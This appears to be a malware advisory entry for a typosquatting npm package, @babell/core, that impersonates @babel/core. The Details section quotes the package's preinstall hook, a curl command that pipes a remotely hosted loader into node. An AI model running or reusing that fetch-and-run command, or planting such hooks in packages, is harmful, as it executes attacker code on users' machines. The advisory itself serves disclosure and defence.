Vulnerability MAL-2026-17497
Unknown
UNKNOWN RISK
Vulnerabilities without an assigned CVSS score. Severity is not determinable from available data.
2 days ago
October 03, 2026 at 06:52 AM UTC
Malicious code in @babell/core (npm)
8.0.6
8.0.6
Summary
Malicious code in @babell/core (npm)
Details
@babell/[email protected] impersonates @babel/core (it copies the code and metadata of @babel/core) and adds a preinstall script that runs on npm install and pipes a remotely hosted loader into node: curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node. This runs attacker-controlled JavaScript with the installing user's privileges. The npm account angularr published @babell/core and 5 similar packages on 2026-10-03 between 06:33 and 07:23 UTC, all with the same preinstall script.
References
Impacted packages
Timeline
Published
2 days ago
October 03, 2026 at 06:52 AM UTC
Last Modified
1 hour ago
October 05, 2026 at 11:00 PM UTC